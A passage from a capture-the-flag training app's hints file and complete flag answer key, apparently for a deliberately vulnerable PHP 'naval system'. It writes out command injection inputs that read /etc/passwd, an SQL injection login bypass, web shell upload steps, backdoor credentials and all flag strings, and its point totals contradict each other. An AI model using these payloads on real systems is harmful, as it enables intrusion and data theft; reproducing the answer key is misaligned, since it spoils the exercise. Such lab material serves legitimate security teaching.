140 | Solution 141 | 142 | Visit: `login.php?sessionid=your_custom_session_id` 143 | This sets a predictable session ID you can hijack. 144 | 145 |
146 | 147 | --- 148 | 149 | ## 🔴 Level 3 - Command Injection (Hard) 150 | 151 | ### Challenge: Ping Command Injection 152 | 153 |
154 | Hint 1 155 | 156 | The "Warship Status" feature executes a ping command. Can you inject additional commands? 157 | 158 |
159 | 160 |
161 | Hint 2 162 | 163 | Try using command separators like `;`, `&&`, or `||` to chain commands. 164 | 165 |
166 | 167 |
168 | Hint 3 169 | 170 | The vulnerable code: `system("ping -c 2 " . $_GET['check_status']);` 171 | 172 |
173 | 174 |
175 | Solution 176 | 177 | Input: `127.0.0.1; whoami` 178 | Or: `127.0.0.1 && cat /etc/passwd` 179 | Or: `127.0.0.1; ls -la` 180 | 181 |
182 | 183 | --- 184 | 185 | ### Challenge: File Upload RCE 186 | 187 |
188 | Hint 1 189 | 190 | The file upload feature doesn't validate file types. Can you upload a PHP file? 191 | 192 |
193 | 194 |
195 | Hint 2 196 | 197 | Upload a PHP web shell and then access it directly. 198 | 199 |
200 | 201 |
202 | Solution 203 | 204 | 1. Create a file `shell.php`: 205 | 206 | ```php 207 | 208 | ``` 209 | 210 | 2. Upload it via the mission upload form 211 | 3. Access: `mission_uploads/shell.php?cmd=whoami` 212 |
213 | 214 | --- 215 | 216 | ## ⚫ Level 4 - Advanced Exploitation (Expert) 217 | 218 | ### Challenge: IDOR (Insecure Direct Object Reference) 219 | 220 |
221 | Hint 1 222 | 223 | The officer profile viewer uses an ID parameter. Can you view other officers' profiles? 224 | 225 |
226 | 227 |
228 | Hint 2 229 | 230 | Try changing the `officer_id` parameter to different numbers. 231 | 232 |
233 | 234 |
235 | Solution 236 | 237 | Visit: `view_profile.php?officer_id=1` 238 | Then try: `view_profile.php?officer_id=2`, `officer_id=3`, etc. 239 | You can view any officer's private information. 240 | 241 |
242 | 243 | --- 244 | 245 | ### Challenge: XSS (Cross-Site Scripting) 246 | 247 |
248 | Hint 1 249 | 250 | Look for URL parameters that are reflected in the page without sanitization. 251 | 252 |
253 | 254 |
255 | Hint 2 256 | 257 | The `welcome` parameter in admin panel and `greeting` in dashboard are vulnerable. 258 | 259 |
260 | 261 |
262 | Solution 263 | 264 | Visit: `admin/index.php?welcome=` 265 | Or: `dashboard.php?greeting=` 266 | 267 |
268 | 269 | --- 270 | 271 | ### Challenge: Database Backup Access 272 | 273 |
274 | Hint 1 275 | 276 | There's a database backup feature accessible to admins. But does it check authentication? 277 | 278 |
279 | 280 |
281 | Hint 2 282 | 283 | Try accessing `/admin/backup_db.php` directly. 284 | 285 |
286 | 287 |
288 | Solution 289 | 290 | Visit: `admin/backup_db.php?download=1` 291 | Downloads the entire database without authentication! 292 | 293 |
294 | 295 | --- 296 | 297 | ## 🎮 Hidden Easter Eggs 298 | 299 | ### Easter Egg 1: Backdoor Account 300 | 301 |
302 | Hint 303 | 304 | There's a hardcoded backdoor account in the login code. Check for unusual username/password combinations. 305 | 306 |
307 | 308 |
309 | Solution 310 | 311 | Username: `navyseal` 312 | Password: `open sesame` 313 | 314 |
315 | 316 | --- 317 | 318 | ### Easter Egg 2: Debug Mode 319 | 320 |
321 | Hint 322 | 323 | Try using "debug" as a username to see what happens. 324 | 325 |
326 | 327 |
328 | Solution 329 | 330 | Username: `debug` 331 | Password: (anything) 332 | Reveals the SQL query being executed. 333 | 334 |
335 | 336 | --- 337 | 338 | ### Easter Egg 3: Secret Backup Code 339 | 340 |
341 | Hint 342 | 343 | The backup page has a secret code parameter. It's a leet speak number. 344 | 345 |
346 | 347 |
348 | Solution 349 | 350 | Visit: `admin/backup_db.php?code=1337` 351 | Reveals: `CTF{backdoor_backup_1337}` 352 | 353 |
354 | 355 | --- 356 | 357 | ### Easter Egg 4: Konami Code 358 | 359 |
360 | Hint 361 | 362 | Try the classic Konami code on the admin panel. 363 | 364 |
365 | 366 |
367 | Solution 368 | 369 | On admin panel, press: ↑↑↓↓←→←→BA 370 | Unlocks secret admin console. 371 | 372 |
373 | 374 | --- 375 | 376 | ### Easter Egg 5: Right-Click Secret 377 | 378 |
379 | Hint 380 | 381 | Try right-clicking on the admin panel page. 382 | 383 |
384 | 385 |
386 | Solution 387 | 388 | Right-click anywhere on the admin panel to reveal the hidden command console. 389 | 390 |
391 | 392 | --- 393 | 394 | ## 🏆 Achievement Guide 395 | 396 | ### Script Kiddie (3 Easter Eggs) 397 | 398 | Find any 3 easter eggs from the list above. 399 | 400 | ### SQL Ninja 401 | 402 | Successfully exploit SQL injection to gain unauthorized access. 403 | 404 | ### Command Master 405 | 406 | Achieve remote code execution via command injection. 407 | 408 | ### Admin Pwned 409 | 410 | Gain admin access using at least 3 different methods. 411 | 412 | ### Full Compromise 413 | 414 | Exploit all 22 documented vulnerabilities. 415 | 416 | --- 417 | 418 | ## 💡 General Tips 419 | 420 | 1. **Use Browser DevTools**: Inspect cookies, local storage, and network requests 421 | 2. **Try Burp Suite**: Intercept and modify requests 422 | 3. **Read the Source**: Sometimes hints are in HTML comments or JavaScript 423 | 4. **Check Logs**: Some actions are logged and might reveal information 424 | 5. **Think Like an Attacker**: What would you try if this was a real system? 425 | 426 | --- 427 | 428 | ## 📚 Need More Help? 429 | 430 | If you're still stuck, check out: 431 | 432 | - `RESOURCES.md` for learning materials 433 | - `FLAGS.md` for the complete list of challenges 434 | - The source code (but try without it first!) 435 | 436 | Good luck, and happy hacking! 🚀 437 | -------------------------------------------------------------------------------- /FLAGS.md: -------------------------------------------------------------------------------- 1 | # 🚩 HIVE Naval System - Flags & Scoring 2 | 3 | ## 📊 Scoring System 4 | 5 | **Total Possible Points**: 285 6 | **Total Flags**: 32 7 | 8 | --- 9 | 10 | ## 🟢 Easy Flags (5 points each) - 50 points total 11 | 12 | ### FLAG-001: Default Login ✓ 13 | 14 | **Points**: 5 15 | **Challenge**: Login with default credentials 16 | **Flag**: `CTF{carl_loves_his_wife}` 17 | **How to capture**: Login as `carl` / `ilovemywife` 18 | 19 | ### FLAG-002: Easter Egg - Please Admin ✓ 20 | 21 | **Points**: 5 22 | **Challenge**: Find the dashboard easter egg 23 | **Flag**: `CTF{admin_credentials_revealed}` 24 | **How to capture**: Type "please admin" in any dashboard input field 25 | 26 | ### FLAG-003: Backdoor Account ✓ 27 | 28 | **Points**: 5 29 | **Challenge**: Find the hardcoded backdoor 30 | **Flag**: `CTF{navyseal_backdoor_access}` 31 | **How to capture**: Login as `navyseal` / `open sesame` 32 | 33 | ### FLAG-004: Debug Mode ✓ 34 | 35 | **Points**: 5 36 | **Challenge**: Trigger debug information leak 37 | **Flag**: `CTF{debug_query_exposed}` 38 | **How to capture**: Login with username `debug` and any password 39 | 40 | ### FLAG-005: Secret Backup Code ✓ 41 | 42 | **Points**: 5 43 | **Challenge**: Find the backup easter egg 44 | **Flag**: `CTF{backdoor_backup_1337}` 45 | **How to capture**: Visit `admin/backup_db.php?code=1337` 46 | 47 | ### FLAG-006: Konami Code ✓ 48 | 49 | **Points**: 5 50 | **Challenge**: Unlock the secret console 51 | **Flag**: `CTF{konami_code_master}` 52 | **How to capture**: Enter ↑↑↓↓←→←→BA on admin panel 53 | 54 | ### FLAG-007: Right-Click Console ✓ 55 | 56 | **Points**: 5 57 | **Challenge**: Find the hidden admin console 58 | **Flag**: `CTF{right_click_revealed}` 59 | **How to capture**: Right-click on admin panel 60 | 61 | ### FLAG-008: Honeypot Discovery ✓ 62 | 63 | **Points**: 5 64 | **Challenge**: Trigger the honeypot 65 | **Flag**: `CTF{honeypot_triggered}` 66 | **How to capture**: Fill the hidden honeypot field in login form 67 | 68 | ### FLAG-009: Admin Login ✓ 69 | 70 | **Points**: 5 71 | **Challenge**: Login as admin 72 | **Flag**: `CTF{admin_panel_accessed}` 73 | **How to capture**: Login as `admin` / `navy12345` 74 | 75 | ### FLAG-010: Database Exposed ✓ 76 | 77 | **Points**: 5 78 | **Challenge**: View officer database 79 | **Flag**: `CTF{officer_database_leaked}` 80 | **How to capture**: Access `components/upload.php` to see all officers 81 | 82 | --- 83 | 84 | ## 🟡 Medium Flags (10 points each) - 100 points total 85 | 86 | ### FLAG-011: SQL Injection Login ⚔️ 87 | 88 | **Points**: 10 89 | **Challenge**: Bypass authentication with SQL injection 90 | **Flag**: `CTF{sql_injection_pwned}` 91 | **How to capture**: Login with `admin'--` as username 92 | 93 | ### FLAG-012: Cookie Manipulation ⚔️ 94 | 95 | **Points**: 10 96 | **Challenge**: Escalate privileges via cookie 97 | **Flag**: `CTF{cookie_privilege_escalation}` 98 | **How to capture**: Set cookie `override_admin=true` and access admin panel 99 | 100 | ### FLAG-013: Session Fixation ⚔️ 101 | 102 | **Points**: 10 103 | **Challenge**: Fix a session ID 104 | **Flag**: `CTF{session_fixation_attack}` 105 | **How to capture**: Visit `login.php?sessionid=hacked123` and login 106 | 107 | ### FLAG-014: IDOR - View All Officers ⚔️ 108 | 109 | **Points**: 10 110 | **Challenge**: Access unauthorized officer profiles 111 | **Flag**: `CTF{idor_all_officers_exposed}` 112 | **How to capture**: Access `view_profile.php?officer_id=1` through `officer_id=70` 113 | 114 | ### FLAG-015: XSS in Dashboard ⚔️ 115 | 116 | **Points**: 10 117 | **Challenge**: Execute JavaScript in dashboard 118 | **Flag**: `CTF{xss_dashboard_pwned}` 119 | **How to capture**: Visit `dashboard.php?greeting=` 120 | 121 | ### FLAG-016: XSS in Admin Panel ⚔️ 122 | 123 | **Points**: 10 124 | **Challenge**: Execute JavaScript in admin panel 125 | **Flag**: `CTF{xss_admin_pwned}` 126 | **How to capture**: Visit `admin/index.php?welcome=` 127 | 128 | ### FLAG-017: Unrestricted File Upload ⚔️ 129 | 130 | **Points**: 10 131 | **Challenge**: Upload a malicious file 132 | **Flag**: `CTF{unrestricted_upload_success}` 133 | **How to capture**: Upload any non-text file (e.g., .php, .exe) 134 | 135 | ### FLAG-018: Database Backup Download ⚔️ 136 | 137 | **Points**: 10 138 | **Challenge**: Download the database without auth 139 | **Flag**: `CTF{database_backup_stolen}` 140 | **How to capture**: Visit `admin/backup_db.php?download=1` 141 | 142 | ### FLAG-019: Information Disclosure ⚔️ 143 | 144 | **Points**: 10 145 | **Challenge**: Find hardcoded credentials 146 | **Flag**: `CTF{hardcoded_db_credentials}` 147 | **How to capture**: View `includes/config.php` source 148 | 149 | ### FLAG-020: Session Debug ⚔️ 150 | 151 | **Points**: 10 152 | **Challenge**: Expose session data 153 | **Flag**: `CTF{session_data_exposed}` 154 | **How to capture**: Visit `dashboard.php?debug=1` 155 | 156 | --- 157 | 158 | ## 🔴 Hard Flags (15 points each) - 90 points total 159 | 160 | ### FLAG-021: Command Injection - Ping ⚔️⚔️ 161 | 162 | **Points**: 15 163 | **Challenge**: Execute system commands via ping 164 | **Flag**: `CTF{command_injection_rce}` 165 | **How to capture**: Input `127.0.0.1; cat /etc/passwd` in warship status 166 | 167 | ### FLAG-022: Command Injection - Upload Log ⚔️⚔️ 168 | 169 | **Points**: 15 170 | **Challenge**: Execute commands via filename 171 | **Flag**: `CTF{filename_command_injection}` 172 | **How to capture**: Upload file named `test.txt; whoami` 173 | 174 | ### FLAG-023: File Upload RCE ⚔️⚔️ 175 | 176 | **Points**: 15 177 | **Challenge**: Achieve remote code execution 178 | **Flag**: `CTF{php_webshell_uploaded}` 179 | **How to capture**: Upload PHP shell and execute commands 180 | 181 | ### FLAG-024: CSRF Command Execution ⚔️⚔️ 182 | 183 | **Points**: 15 184 | **Challenge**: Execute commands via CSRF 185 | **Flag**: `CTF{csrf_command_execution}` 186 | **How to capture**: POST to admin panel with command parameter 187 | 188 | ### FLAG-025: Path Traversal ⚔️⚔️ 189 | 190 | **Points**: 15 191 | **Challenge**: Access files outside webroot 192 | **Flag**: `CTF{path_traversal_success}` 193 | **How to capture**: Access mission files with `../` sequences 194 | 195 | ### FLAG-026: Diagnostic Console Access ⚔️⚔️ 196 | 197 | **Points**: 15 198 | **Challenge**: Access the admin diagnostic console 199 | **Flag**: `CTF{diagnostic_console_pwned}` 200 | **How to capture**: Access `missions/poc.php` as admin 201 | 202 | --- 203 | 204 | ## ⚫ Expert Flags (20 points each) - 40 points total 205 | 206 | ### FLAG-027: Chain SQLi + Cookie Override ⚔️⚔️⚔️ 207 | 208 | **Points**: 20 209 | **Challenge**: Combine SQL injection with cookie manipulation 210 | **Flag**: `CTF{chained_attack_master}` 211 | **How to capture**: SQLi login + set override_admin cookie 212 | 213 | ### FLAG-028: Full System Compromise ⚔️⚔️⚔️ 214 | 215 | **Points**: 20 216 | **Challenge**: Achieve complete system control 217 | **Flag**: `CTF{full_system_compromise}` 218 | **How to capture**: Upload web shell + execute privileged commands 219 | 220 | --- 221 | 222 | ## 🏆 Achievement Flags (5 points each) - 5 points total 223 | 224 | ### FLAG-029: Script Kiddie 🏅 225 | 226 | **Points**: 5 227 | **Challenge**: Find 3 easter eggs 228 | **Flag**: `CTF{script_kiddie_achievement}` 229 | 230 | ### FLAG-030: SQL Ninja 🥇 231 | 232 | **Points**: 5 233 | **Challenge**: Complete all SQL injection challenges 234 | **Flag**: `CTF{sql_ninja_achievement}` 235 | 236 | ### FLAG-031: Command Master 👑 237 | 238 | **Points**: 5 239 | **Challenge**: Complete all command injection challenges 240 | **Flag**: `CTF{command_master_achievement}` 241 | 242 | ### FLAG-032: Full Compromise 🔥 243 | 244 | **Points**: 5 245 | **Challenge**: Capture all 28 vulnerability flags 246 | **Flag**: `CTF{full_compromise_achievement}` 247 | 248 | --- 249 | 250 | ## 📈 Difficulty Breakdown 251 | 252 | | Difficulty | Flags | Points Each | Total Points | 253 | | -------------- | ------ | ----------- | ------------ | 254 | | 🟢 Easy | 10 | 5 | 50 | 255 | | 🟡 Medium | 10 | 10 | 100 | 256 | | 🔴 Hard | 6 | 15 | 90 | 257 | | ⚫ Expert | 2 | 20 | 40 | 258 | | 🏆 Achievement | 4 | 5 | 20 | 259 | | **TOTAL** | **32** | - | **300** | 260 | 261 | --- 262 | 263 | ## 🎯 Recommended Path 264 | 265 | ### Beginner Path 266 | 267 | 1. Start with Easy flags (FLAG-001 to FLAG-010) 268 | 2. Learn about SQL injection (FLAG-011) 269 | 3. Try IDOR (FLAG-014) 270 | 4. Experiment with XSS (FLAG-015, FLAG-016) 271 | 272 | ### Intermediate Path 273 | 274 | 1. Complete all Medium flags 275 | 2. Try command injection (FLAG-021) 276 | 3. Upload a web shell (FLAG-023) 277 | 278 | ### Advanced Path 279 | 280 | 1. Complete all Hard flags 281 | 2. Chain multiple vulnerabilities (FLAG-027) 282 | 3. Achieve full compromise (FLAG-028) 283 | 284 | --- 285 | 286 | ## 🏅 Ranking System 287 | 288 | | Points | Rank | 289 | | ------- | ---------------- | 290 | | 0-50 | Recruit | 291 | | 51-100 | Ensign | 292 | | 101-150 | Lieutenant | 293 | | 151-200 | Commander | 294 | | 201-250 | Captain | 295 | | 251-285 | Admiral | 296 | | 285+ | Fleet Admiral ⭐ | 297 | 298 | --- 299 | 300 | ## 📝 Flag Submission 301 | 302 | To track your progress, create a file `my_flags.txt` and record each flag as you find it: 303 | 304 | ``` 305 | FLAG-001: CTF{carl_loves_his_wife} - 5 points 306 | FLAG-002: CTF{admin_credentials_revealed} - 5 points 307 | ... 308 | Total: XX/285 points 309 | Rank: [Your Rank] 310 | ``` 311 | 312 | --- 313 | 314 | ## 🎮 Speedrun Categories 315 | 316 | ### Any% (Fastest to 100 points) 317 | 318 | Current Record: _Not set_ 319 | 320 | ### 100% (All flags) 321 | 322 | Current Record: _Not set_ 323 | 324 | ### No Hints% (All flags without HINTS.md) 325 | 326 | Current Record: _Not set_ 327 | 328 | --- 329 | 330 | Good luck capturing all the flags! 🚀 331 | --------------------------------------------------------------------------------